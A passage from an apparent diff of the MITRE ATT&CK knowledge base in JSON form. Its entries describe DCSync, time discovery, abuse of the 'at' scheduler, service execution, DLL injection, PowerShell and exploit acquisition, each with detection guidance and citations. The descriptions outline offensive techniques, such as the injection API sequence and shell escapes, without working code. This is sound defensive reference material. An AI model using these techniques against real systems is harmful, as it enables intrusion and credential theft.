requests(Citation: Microsoft SAMR) from IPs not associated with known domain controllers.(Citation: AdSecurity DCSync Sept 2015)\n\nNote: Domain controllers may not log replication requests originating from the default domain controller account.(Citation: Harmj0y DCSync Sept 2015)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163", + "created": "2020-02-11T18:45:34.293Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1003/006", + "external_id": "T1003.006" + }, + { + "source_name": "Microsoft DRSR Dec 2017", + "description": "Microsoft. (2017, December 1). MS-DRSR Directory Replication Service (DRS) Remote Protocol. Retrieved December 4, 2017.", + "url": "https://msdn.microsoft.com/library/cc228086.aspx" + }, + { + "source_name": "Microsoft GetNCCChanges", + "description": "Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December 4, 2017.", + "url": "https://msdn.microsoft.com/library/dd207691.aspx" + }, + { + "source_name": "Samba DRSUAPI", + "description": "SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.", + "url": "https://wiki.samba.org/index.php/DRSUAPI" + }, + { + "source_name": "Wine API samlib.dll", + "description": "Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017.", + "url": "https://source.winehq.org/WineAPI/samlib.html" + }, + { + "source_name": "ADSecurity Mimikatz DCSync", + "description": "Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation, and Detection. Retrieved August 7, 2017.", + "url": "https://adsecurity.org/?p=1729" + }, + { + "source_name": "Harmj0y Mimikatz and DCSync", + "description": "Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids, Oh My. Retrieved August 7, 2017.", + "url": "http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/" + }, + { + "source_name": "InsiderThreat ChangeNTLM July 2017", + "description": "Warren, J. (2017, July 11). Manipulating User Passwords with Mimikatz. Retrieved December 4, 2017.", + "url": "https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM" + }, + { + "source_name": "GitHub Mimikatz lsadump Module", + "description": "Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved August 7, 2017.", + "url": "https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump" + }, + { + "source_name": "Microsoft NRPC Dec 2017", + "description": "Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol. Retrieved December 6, 2017.", + "url": "https://msdn.microsoft.com/library/cc237008.aspx" + }, + { + "source_name": "Microsoft SAMR", + "description": "Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.", + "url": "https://msdn.microsoft.com/library/cc245496.aspx" + }, + { + "source_name": "AdSecurity DCSync Sept 2015", + "description": "Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation, and Detection. Retrieved December 4, 2017.", + "url": "https://adsecurity.org/?p=1729" + }, + { + "source_name": "Harmj0y DCSync Sept 2015", + "description": "Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids, Oh My. Retrieved December 4, 2017.", + "url": "http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-16T12:50:15.929Z", + "name": "System Time Discovery", + "description": "An adversary may gather the system time and/or time zone settings from a local or remote system. The system time is set and stored by services, such as the Windows Time Service on Windows or systemsetup on macOS.(Citation: MSDN System Time)(Citation: Technet Windows Time Service)(Citation: systemsetup mac time) These time settings may also be synchronized between systems and services in an enterprise network, typically accomplished with a network time server within a domain.(Citation: Mac Time Sync)(Citation: linux system time)\n\nSystem time information may be gathered in a number of ways, such as with [Net](https://attack.mitre.org/software/S0039) on Windows by performing net time \\\\hostname to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using w32tm /tz.(Citation: Technet Windows Time Service) In addition, adversaries can discover device uptime through functions such as GetTickCount() to determine how long it has been since the system booted up.(Citation: Virtualization/Sandbox Evasion)\n\nOn network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show clock detail` can be used to see the current time configuration.(Citation: show_clock_detail_cisco_cmd)\n\nIn addition, system calls – such as time() – have been used to collect the current time on Linux devices.(Citation: MAGNET GOBLIN) On macOS systems, adversaries may use commands such as systemsetup -gettimezone or timeIntervalSinceNow to gather current time zone information or current date and time.(Citation: System Information Discovery Technique)(Citation: ESET DazzleSpy Jan 2022)\n\nThis information could be useful for performing other techniques, such as executing a file with a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)(Citation: RSA EU12 They're Inside), or to discover locality information based on time zone to assist in victim targeting (i.e. [System Location Discovery](https://attack.mitre.org/techniques/T1614)). Adversaries may also use knowledge of system time as part of a time bomb, or delaying execution until a specified date/time.(Citation: AnyRun TimeBomb)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "FIRST.ORG's Cyber Threat Intelligence SIG", + "Austin Clark, @c2defense" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Command-line interface monitoring may be useful to detect instances of net.exe or other command-line utilities being used to gather system time or time zone. Methods of detecting API use for gathering this information are likely less useful due to how often they may be used by legitimate software.\n\nFor network infrastructure devices, collect AAA logging to monitor `show` commands being run by non-standard users from non-standard locations.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Network", + "Linux", + "macOS" + ], + "x_mitre_version": "1.4", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--f3c544dc-673c-4ef3-accb-53229f1ae077", + "created": "2017-05-31T21:31:37.450Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1124", + "external_id": "T1124" + }, + { + "source_name": "systemsetup mac time", + "description": "Apple Support. (n.d.). About systemsetup in Remote Desktop. Retrieved March 27, 2024.", + "url": "https://support.apple.com/en-gb/guide/remote-desktop/apd95406b8d/mac" + }, + { + "source_name": "linux system time", + "description": "ArchLinux. (2024, February 1). System Time. Retrieved March 27, 2024.", + "url": "https://wiki.archlinux.org/title/System_time" + }, + { + "source_name": "MAGNET GOBLIN", + "description": "Check Point Research. (2024, March 8). MAGNET GOBLIN TARGETS PUBLICLY FACING SERVERS USING 1-DAY VULNERABILITIES. Retrieved March 27, 2024.", + "url": "https://research.checkpoint.com/2024/magnet-goblin-targets-publicly-facing-servers-using-1-day-vulnerabilities/" + }, + { + "source_name": "show_clock_detail_cisco_cmd", + "description": "Cisco. (2023, March 6). show clock detail - Cisco IOS Security Command Reference: Commands S to Z . Retrieved July 13, 2022.", + "url": "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/s1/sec-s1-cr-book/sec-cr-s2.html#wp1896741674" + }, + { + "source_name": "Mac Time Sync", + "description": "Cone, Matt. (2021, January 14). Synchronize your Mac's Clock with a Time Server. Retrieved March 27, 2024.", + "url": "https://www.macinstruct.com/tutorials/synchronize-your-macs-clock-with-a-time-server/" + }, + { + "source_name": "ESET DazzleSpy Jan 2022", + "description": "M.Léveillé, M., Cherepanov, A.. (2022, January 25). Watering hole deploys new macOS malware, DazzleSpy, in Asia. Retrieved May 6, 2022.", + "url": "https://www.welivesecurity.com/2022/01/25/watering-hole-deploys-new-macos-malware-dazzlespy-asia/" + }, + { + "source_name": "AnyRun TimeBomb", + "description": "Malicious History. (2020, September 17). Time Bombs: Malware With Delayed Execution. Retrieved April 22, 2021.", + "url": "https://any.run/cybersecurity-blog/time-bombs-malware-with-delayed-execution/" + }, + { + "source_name": "Technet Windows Time Service", + "description": "Mathers, B. (2016, September 30). Windows Time Service Tools and Settings. Retrieved November 25, 2016.", + "url": "https://technet.microsoft.com/windows-server-docs/identity/ad-ds/get-started/windows-time-service/windows-time-service-tools-and-settings" + }, + { + "source_name": "MSDN System Time", + "description": "Microsoft. (n.d.). System Time. Retrieved November 25, 2016.", + "url": "https://msdn.microsoft.com/ms724961.aspx" + }, + { + "source_name": "RSA EU12 They're Inside", + "description": "Rivner, U., Schwartz, E. (2012). They’re Inside… Now What?. Retrieved November 25, 2016.", + "url": "https://www.rsaconference.com/writable/presentations/file_upload/ht-209_rivner_schwartz.pdf" + }, + { + "source_name": "System Information Discovery Technique", + "description": "YUCEEL, Huseyin Can. Picus Labs. (2022, June 9). The System Information Discovery Technique Explained - MITRE ATT&CK T1082. Retrieved March 27, 2024.", + "url": "https://www.picussecurity.com/resource/the-system-information-discovery-technique-explained-mitre-attack-t1082" + }, + { + "source_name": "Virtualization/Sandbox Evasion", + "description": "YUCEEL, Huseyin Can. Picus Labs. (2022, June 9). Virtualization/Sandbox Evasion - How Attackers Avoid Malware Analysis. Retrieved December 26, 2023.", + "url": "https://www.picussecurity.com/resource/virtualization/sandbox-evasion-how-attackers-avoid-malware-analysis" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-11-15T14:38:10.876Z", + "name": "At", + "description": "Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.\n\nOn Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the at.allow file. If the at.allow file does not exist, the at.deny file is checked. Every username not listed in at.deny is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the at.deny exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)\n\nAdversaries may use [at](https://attack.mitre.org/software/S0110) to execute programs at system startup or on a scheduled basis for [Persistence](https://attack.mitre.org/tactics/TA0003). [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote [Execution](https://attack.mitre.org/tactics/TA0002) as part of [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and/or to run a process under the context of a specified account (such as SYSTEM).\n\nIn Linux environments, adversaries may also abuse [at](https://attack.mitre.org/software/S0110) to break out of restricted environments by using a task to spawn an interactive system shell or to run system commands. Similarly, [at](https://attack.mitre.org/software/S0110) may also be used for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) if the binary is allowed to run as superuser via sudo.(Citation: GTFObins at)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\\System32\\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc.\n\nConfigure event logging for scheduled task creation and changes by enabling the \"Microsoft-Windows-TaskScheduler/Operational\" setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10)\n\n* Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered\n* Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated\n* Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted\n* Event ID 4698 on Windows 10, Server 2016 - Scheduled task created\n* Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled\n* Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns)\n\nRemote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data.\n\nIn Linux and macOS environments, monitor scheduled task creation using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc. \n\nReview all jobs using the atq command and ensure IP addresses stored in the SSH_CONNECTION and SSH_CLIENT variables, machines that created the jobs, are trusted hosts. All [at](https://attack.mitre.org/software/S0110) jobs are stored in /var/spool/cron/atjobs/.(Citation: rowland linux at 2019)\n\nSuspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for [Command and Control](https://attack.mitre.org/tactics/TA0011), learning details about the environment through [Discovery](https://attack.mitre.org/tactics/TA0007), and [Lateral Movement](https://attack.mitre.org/tactics/TA0008).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Linux", + "macOS" + ], + "x_mitre_version": "2.2", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator", + "User" + ], + "x_mitre_remote_support": true, + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--f3d95a1f-bba2-44ce-9af7-37866cd63fd0", + "created": "2019-11-27T13:52:45.853Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1053/002", + "external_id": "T1053.002" + }, + { + "source_name": "rowland linux at 2019", + "description": "Craig Rowland. (2019, July 25). Getting an Attacker IP Address from a Malicious Linux At Job. Retrieved October 15, 2021.", + "url": "https://www.linkedin.com/pulse/getting-attacker-ip-address-from-malicious-linux-job-craig-rowland/" + }, + { + "source_name": "GTFObins at", + "description": "Emilio Pinna, Andrea Cardaci. (n.d.). gtfobins at. Retrieved September 28, 2021.", + "url": "https://gtfobins.github.io/gtfobins/at/" + }, + { + "source_name": "Linux at", + "description": "IEEE/The Open Group. (2017). at(1p) — Linux manual page. Retrieved February 25, 2022.", + "url": "https://man7.org/linux/man-pages/man1/at.1p.html" + }, + { + "source_name": "Twitter Leoloobeek Scheduled Task", + "description": "Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved December 12, 2017.", + "url": "https://twitter.com/leoloobeek/status/939248813465853953" + }, + { + "source_name": "Microsoft Scheduled Task Events Win10", + "description": "Microsoft. (2017, May 28). Audit Other Object Access Events. Retrieved June 27, 2019.", + "url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-object-access-events" + }, + { + "source_name": "TechNet Scheduled Task Events", + "description": "Microsoft. (n.d.). General Task Registration. Retrieved December 12, 2017.", + "url": "https://technet.microsoft.com/library/dd315590.aspx" + }, + { + "source_name": "TechNet Autoruns", + "description": "Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.", + "url": "https://technet.microsoft.com/en-us/sysinternals/bb963902" + }, + { + "source_name": "TechNet Forum Scheduled Task Operational Setting", + "description": "Satyajit321. (2015, November 3). Scheduled Tasks History Retention settings. Retrieved December 12, 2017.", + "url": "https://social.technet.microsoft.com/Forums/en-US/e5bca729-52e7-4fcb-ba12-3225c564674c/scheduled-tasks-history-retention-settings?forum=winserver8gen" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Service Execution", + "description": "Adversaries may execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager. This can be done by either creating a new service or modifying an existing service. This technique is the execution used in conjunction with [New Service](https://attack.mitre.org/techniques/T1050) and [Modify Existing Service](https://attack.mitre.org/techniques/T1031) during service persistence or privilege escalation.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Changes to service Registry entries and command-line invocation of tools capable of modifying services that do not correlate with known software, patch cycles, etc., may be suspicious. If a service is used only to execute a binary or script and not to persist, then it will likely be changed back to its original form shortly after the service is restarted so the service is not left broken, as is the case with the common administrator tool [PsExec](https://attack.mitre.org/software/S0029).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator", + "SYSTEM" + ], + "x_mitre_remote_support": true, + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--f44731de-ea9f-406d-9b83-30ecbb9b4392", + "created": "2017-05-31T21:30:36.550Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1035", + "external_id": "T1035" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-08-11T21:34:38.558Z", + "name": "Dynamic-link Library Injection", + "description": "Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process. \n\nDLL injection is commonly performed by writing the path to a DLL in the virtual address space of the target process before loading the DLL by invoking a new thread. The write can be performed with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, then invoked with CreateRemoteThread (which calls the LoadLibrary API responsible for loading the DLL). (Citation: Elastic Process Injection July 2017) \n\nVariations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue as well as the additional APIs to invoke execution (since these methods load and execute the files in memory by manually preforming the function of LoadLibrary).(Citation: Elastic HuntingNMemory June 2017)(Citation: Elastic Process Injection July 2017) \n\nAnother variation of this method, often referred to as Module Stomping/Overloading or DLL Hollowing, may be leveraged to conceal injected code within a process. This method involves loading a legitimate DLL into a remote process then manually overwriting the module's AddressOfEntryPoint before starting a new thread in the target process.(Citation: Module Stomping for Shellcode Injection) This variation allows attackers to hide malicious injected code by potentially backing its execution with a legitimate DLL file on disk.(Citation: Hiding Malicious Code with Module Stomping) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Boominathan Sundaram" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nMonitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process. \n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Application control", + "Anti-virus" + ], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945", + "created": "2020-01-14T01:26:08.145Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1055/001", + "external_id": "T1055.001" + }, + { + "source_name": "Hiding Malicious Code with Module Stomping", + "description": "Aliz Hammond. (2019, August 15). Hiding Malicious Code with \"Module Stomping\": Part 1. Retrieved July 14, 2022.", + "url": "https://blog.f-secure.com/hiding-malicious-code-with-module-stomping/" + }, + { + "source_name": "Elastic HuntingNMemory June 2017", + "description": "Desimone, J. (2017, June 13). Hunting in Memory. Retrieved December 7, 2017.", + "url": "https://www.endgame.com/blog/technical-blog/hunting-memory" + }, + { + "source_name": "Elastic Process Injection July 2017", + "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.", + "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" + }, + { + "source_name": "Module Stomping for Shellcode Injection", + "description": "Red Teaming Experiments. (n.d.). Module Stomping for Shellcode Injection. Retrieved July 14, 2022.", + "url": "https://www.ired.team/offensive-security/code-injection-process-injection/modulestomping-dll-hollowing-shellcode-injection" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "PowerShell", + "description": "PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer. \n\nPowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.\n\nAdministrator permissions are required to use PowerShell to connect to remote systems.\n\nA number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), PowerSploit, (Citation: Powersploit) and PSAttack. (Citation: Github PSAttack)\n\nPowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015) (Citation: Microsoft PSfromCsharp APR 2014)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Praetorian" + ], + "x_mitre_detection": "If proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. If PowerShell is not used in an environment, then simply looking for PowerShell execution may detect malicious activity.\n\nMonitor for loading and/or execution of artifacts associated with PowerShell specific assemblies, such as System.Management.Automation.dll (especially to unusual process names/locations). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)\n\nIt is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution (which is applied to .NET invocations). (Citation: Malware Archaeology PowerShell Cheat Sheet) PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features. (Citation: FireEye PowerShell Logging 2016) An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User", + "Administrator" + ], + "x_mitre_remote_support": true, + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "created": "2017-05-31T21:31:06.512Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1086", + "external_id": "T1086" + }, + { + "source_name": "TechNet PowerShell", + "description": "Microsoft. (n.d.). Windows PowerShell Scripting. Retrieved April 28, 2016.", + "url": "https://technet.microsoft.com/en-us/scriptcenter/dd742419.aspx" + }, + { + "source_name": "Powersploit", + "description": "PowerSploit. (n.d.). Retrieved December 4, 2014.", + "url": "https://github.com/mattifestation/PowerSploit" + }, + { + "source_name": "Github PSAttack", + "description": "Haight, J. (2016, April 21). PS>Attack. Retrieved June 1, 2016.", + "url": "https://github.com/jaredhaight/PSAttack" + }, + { + "source_name": "Sixdub PowerPick Jan 2016", + "description": "Warner, J.. (2015, January 6). Inexorable PowerShell – A Red Teamer’s Tale of Overcoming Simple AppLocker Policies. Retrieved December 8, 2018.", + "url": "http://www.sixdub.net/?p=367" + }, + { + "source_name": "SilentBreak Offensive PS Dec 2015", + "description": "Christensen, L.. (2015, December 28). The Evolution of Offensive PowerShell Invocation. Retrieved December 8, 2018.", + "url": "https://silentbreaksecurity.com/powershell-jobs-without-powershell-exe/" + }, + { + "source_name": "Microsoft PSfromCsharp APR 2014", + "description": "Babinec, K. (2014, April 28). Executing PowerShell scripts from C#. Retrieved April 22, 2019.", + "url": "https://blogs.msdn.microsoft.com/kebab/2014/04/28/executing-powershell-scripts-from-c/" + }, + { + "source_name": "Malware Archaeology PowerShell Cheat Sheet", + "description": "Malware Archaeology. (2016, June). WINDOWS POWERSHELL LOGGING CHEAT SHEET - Win 7/Win 2008 or later. Retrieved June 24, 2016.", + "url": "http://www.malwarearchaeology.com/s/Windows-PowerShell-Logging-Cheat-Sheet-ver-June-2016-v2.pdf" + }, + { + "source_name": "FireEye PowerShell Logging 2016", + "description": "Dunwoody, M. (2016, February 11). GREATER VISIBILITY THROUGH POWERSHELL LOGGING. Retrieved February 16, 2016.", + "url": "https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Exploits", + "description": "Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying)\n\nIn addition to downloading free exploits from the internet, adversaries may purchase exploits from third-party entities. Third-party entities can include technology companies that specialize in exploit development, criminal marketplaces (including exploit kits), or from individuals.(Citation: PegasusCitizenLab)(Citation: Wired SandCat Oct 2019) In addition to purchasing exploits, adversaries may steal and repurpose exploits from third-party entities (including other adversaries).(Citation: TempertonDarkHotel)\n\nAn adversary may monitor exploit provider forums to understand the state of existing, as well as newly discovered, exploits. There is usually a delay between when an exploit is discovered and when it is made public. An adversary may target the systems of those known to conduct exploit research and development in order to gain that knowledge for use during a subsequent operation.\n\nAdversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the use of exploits (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense 